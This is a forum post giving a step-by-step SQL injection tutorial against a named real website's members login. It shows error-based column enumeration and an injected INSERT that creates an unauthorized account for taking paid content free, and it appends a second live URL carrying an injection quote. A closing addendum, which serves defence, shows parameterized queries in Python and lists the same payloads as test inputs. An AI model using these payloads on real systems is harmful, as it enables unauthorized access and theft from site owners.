OK boys and girls. Here is how you can hack some sites using a method called SQL injection.

Now as you all know, sites use databases to store their users' information. SQL Server from Microsoft is one of the popular databases, and 99% of the time the sites using this database are coded in a language called ASP. The pages on such a site end with the extension .asp.

The first test we need to do is to find a form on such a site, say for example a login form. Now our objective is to create an account on such a site.

I'll take a case study. Just today I got an email from an internet marketer promoting this. I mailed him about this vulnerability but he hasn't responded, so I guess he's not bothered about this.. oh well...

http://www.adsalternative.com/index.asp

So we go to the members login page

http://www.adsalternative.com/members/login.asp

BIG mistake letting people know the login page to the members area.

Now we enter the
Code:
'
character in the username field. We get this message.

"Please ensure that you enter both your Username and your Password in order to log in to the members' area"

Which means that he's validating both the username and password. So let's enter ' in both the fields and press login, which returns this error

Code:
"Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near 'ds'.
/includes/databaseconnect.asp, line 21 "

Which means that his ASP script isn't checking for the ' character, and this is the basis of this exploit.

Now we type ' having 1=1-- into the user name and ' into the password and press login, which returns us this error

Code:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'members.id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/includes/databaseconnect.asp, line 21

So now we know that his table name is members and his first column is id.

Now we use a "group by" SQL clause to find out the other column names, so we type the user name as ' group by users.id having 1=1-- and ' as the password and press login, which returns the error

Code:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'members.emailAddress' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/includes/databaseconnect.asp, line 21

So we know his next column is emailAddress. Continuing in this manner, grouping by each column name, we get his whole table structure.

Once we have that, all we need to do is insert a record with our name. So in the username field we enter

Code:
'; insert into members(username,password) values('jack', 'hack')--

and in the password field we enter

Code:
'

and press login.

This has created us an account with the username jack and the password hack. Now we can log in with this username and password and download all his shite for free.

Another example of poor site protection :nutkick:

So mods does this qualify for the VIP access http://tubeautomator.com/squeeze.php'
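
The fix for the login query the post describes, as an added example that is not part of the original post or the site's code: values are bound as parameters and driver errors are never returned to the browser. Python with sqlite3 stands in for ASP and SQL Server; the schema, the alice account and all function names are constructed for illustration.

```python
import hashlib, hmac, os, sqlite3

def _hash(password: str, salt: bytes) -> bytes:
    # Store a salted, slow hash instead of the plaintext password.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db() -> sqlite3.Connection:
    # Constructed schema; only the table name "members" comes from the post.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, "
               "username TEXT UNIQUE, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO members (username, salt, pw_hash) VALUES (?, ?, ?)",
               ("alice", salt, _hash("correct horse", salt)))
    return db

def login(db: sqlite3.Connection, username: str, password: str) -> bool:
    if not username or not password:
        return False
    try:
        # The placeholder sends the value separately from the SQL text, so a
        # quote in the input cannot close the literal or start a new statement.
        row = db.execute("SELECT salt, pw_hash FROM members WHERE username = ?",
                         (username,)).fetchone()
    except sqlite3.Error:
        # Log the detail server-side only: raw driver errors are what exposed
        # the table and column names in the post.
        return False
    if row is None:
        return False
    return hmac.compare_digest(_hash(password, row[0]), row[1])

def member_count(db: sqlite3.Connection) -> int:
    return db.execute("SELECT COUNT(*) FROM members").fetchone()[0]

# The username-field inputs quoted in the post, now handled as plain data.
POST_INPUTS = [
    "'",
    "' having 1=1--",
    "' group by users.id having 1=1--",
    "'; insert into members(username,password) values('jack', 'hack')--",
]
```

On the database side, a login account limited to SELECT on the members table would also have refused the insert even if the query had been built by concatenation.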